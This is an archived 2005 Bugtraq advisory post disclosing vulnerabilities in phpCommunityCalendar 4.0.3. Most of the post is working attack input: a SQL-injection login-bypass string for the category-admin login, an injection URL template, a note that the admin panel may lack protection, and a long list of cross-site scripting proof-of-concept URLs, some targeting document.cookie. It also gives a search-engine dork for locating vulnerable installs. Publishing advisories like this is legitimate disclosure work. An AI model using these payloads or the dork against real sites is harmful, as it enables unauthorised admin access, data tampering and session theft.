phpCommunityCalendar 4.0.3 (possibly prior versions) sql injection / login bypass / cross site scripting

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: phpCommunityCalendar 4.0.3 (possibly prior versions) sql injection / login bypass / cross site scripting
From: retrogod@xxxxxxxxxxxxx
Date: 5 Sep 2005 15:53:04 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

phpCommunityCalendar 4.0.3 (possibly prior versions)
sql injection / login bypass / cross site scripting

software:
site: http://open.appideas.com
download: http://open.appideas.com/Calendar/

1) sql injection / login bypass:
"admin" directory contains tools for the site administrator. "webadmin" 
contains tools for category
administrators. If magic quotes off a user can bypass category admin check 
modifying sql login query, example:
go to http://[target]/[path]/webadmin/login.php and use this:

login: ' or isnull(1/0) /*
password: [nothing here]

now you can add, delete, modify events


2) sql injection:

http://[target]/[path]/week.php?LocationID=-1'[INJECTION]%20/*

3) "admin" directory should be password protected by .htaccess , if not you can
go to control panel as  main admin

http://[target]/[path]/admin/


4) cross site scripting, poc:

4.1) add an event and fill some fields with this:

\'\);</script><script>alert(document.cookie)</script>

4.2) check this urls:

http://[target]/[path]/thankyou.php?LocationID=";><script>alert('LOL')</script>
http://[target]/[path]/calDaily.php?font=";><script>alert('LOL')</script><"
http://[target]/[path]/calMonthly.php?font=";><script>alert('LOL')</script><"
http://[target]/[path]/calMonthlyP.php?font=";><script>alert('LOL')</script><"
http://[target]/[path]/calWeekly.php?font=";><script>alert('LOL')</script><"
http://[target]/[path]/calWeeklyP.php?font=";><script>alert('LOL')</script><"
http://[target]/[path]/calYearly.php?font=";><script>alert('LOL')</script><"
http://[target]/[path]/calYearlyP.php?font=";><script>alert('LOL')</script><"
http://[target]/[path]/day.php?font=";><script>alert('LOL')</script><!--
http://[target]/[path]/day.php?LocationID=";><script>alert('LOL')</script><!--
http://[target]/[path]/event.php?font=";><script>alert('LOL')</script>
http://[target]/[path]/event.php?CeTi=</title><script>alert('LOL')</script>
http://[target]/[path]/event.php?Contact=<script>alert('LOL')</script>
http://[target]/[path]/event.php?Description=<script>alert('LOL')</script>
http://[target]/[path]/event.php?ShowAddress=<script>alert('LOL')</script>
http://[target]/[path]/week.php?font=";><script>alert('LOL')</script>

and so on... (a lot of uninitizialized vars showned)


googledork: "Calendar programming by AppIdeas.com" filetype:php

rgod
site: http://rgod.altervista.org
mail: retrogod@xxxxxxxxxxxxx

original advisory: http://www.rgod.altervista.org/phpccal.html

Prev by Date: Re: FileZilla weakly-encrypted password vulnerability: advisory + PoC
Next by Date: [SECURITY] [DSA 801-1] New ntp packages fix group id confusion
Previous by thread: [NewAngels Advisory] aMember Pro 2.3.X - Remote File Include Vulnerability
Next by thread: [SECURITY] [DSA 801-1] New ntp packages fix group id confusion
Index(es):
- Date
- Thread